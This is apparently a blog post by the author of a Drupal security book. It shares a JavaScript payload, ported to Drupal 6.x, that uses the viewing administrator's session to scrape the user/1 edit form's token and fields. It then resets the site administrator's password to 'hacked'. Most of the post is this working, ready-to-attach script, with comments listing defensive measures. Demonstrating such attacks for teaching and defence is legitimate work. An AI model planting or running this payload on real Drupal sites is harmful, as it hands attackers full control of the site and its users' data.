Update UID1 Password Via Javascript - Ported to Drupal 6.x

Heine Deelstra created a script to update the UID 1 password via JavaScript. The script needed some updating to work with Drupal 6.x, and since my book, Cracking Drupal, is primarily about Drupal 6.x, I updated it. You will find the script attached and presented below:

// Demonstration script: shows what JavaScript running inside a Drupal 6.x page
// can do with the session of whoever is viewing that page. It reads the
// user/1 edit form, copies the values the form requires, and posts the form
// back with a new password.
//
// Defensive takeaways:
//  - The form token read below is a cross-site request forgery defence. It
//    does not help here, because a script running in the site's own origin
//    can simply fetch the form and read the token. The control that matters
//    is keeping untrusted script out of pages (output escaping and filtering,
//    tight control over who may post unfiltered HTML, a content security
//    policy).
//  - Requiring the current password before a password change would stop this
//    flow, since the script never learns the old password.
//  - Requests to user/1/edit from accounts that may not edit it are logged as
//    access denied (see the TODO below); those entries, and unexpected POSTs
//    to user/1/edit, are worth monitoring.

// Test for the presence of jQuery; without it the script does nothing.
if (typeof jQuery == 'function') {
// Fetch a correct token from user/1/edit because we will need it to
// successfully submit the user edit form later. The request is issued from
// the page the script runs in, so it carries that user's session.
// TODO: Include a check to increase the chance that the current user is admin,
// which will reduce the number of access denied error messages in the log.
jQuery.get(Drupal.settings.basePath + 'user/1/edit',
  function (data, status) {
    // Only continue when the edit form was actually returned.
    if (status == 'success') {
      // Extract the token and other required data from the returned HTML.
      // Current account name, read from the edit-name input.
      var matches = data.match(/id="edit-name" size="[0-9]*" value="([a-z0-9]*)"/);
      var name = matches[1];
      // Current e-mail address, read from the edit-mail input.
      var matches = data.match(/id="edit-mail" size="[0-9]*" value="([a-z0-9]*@[a-z0-9]*.[a-z0-9]*)"/);
      var mail = matches[1];
      // Form token of the user profile form (the anti-forgery value).
      var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9]*)"/);
      var token = matches[1];
      // Build id of this form instance; the first capture (the id attribute) is used.
      var matches = data.match(/name="form_build_id" id="(form-[a-z0-9]*)" value="(form-[a-z0-9]*)"/);
      var build_id = matches[1];
      // Post the minimum amount of fields. Other fields get their default values.
      // Name and mail are sent back unchanged; only the password fields differ.
      var payload = {
        "name": name,
        "mail": mail,
        "form_id": 'user_profile_form',
        "form_token": token,
        build_id : build_id,
        // Both password confirmation fields carry the same hard-coded value.
        "pass[pass1]": 'hacked',
        "pass[pass2]": 'hacked'
      };
      // Submit the form; the response is not inspected.
      jQuery.post(Drupal.settings.basePath +  'user/1/edit', payload);
      }
    }
  );
}
Attachment: uid1_changer.js.txt (1.39 KB)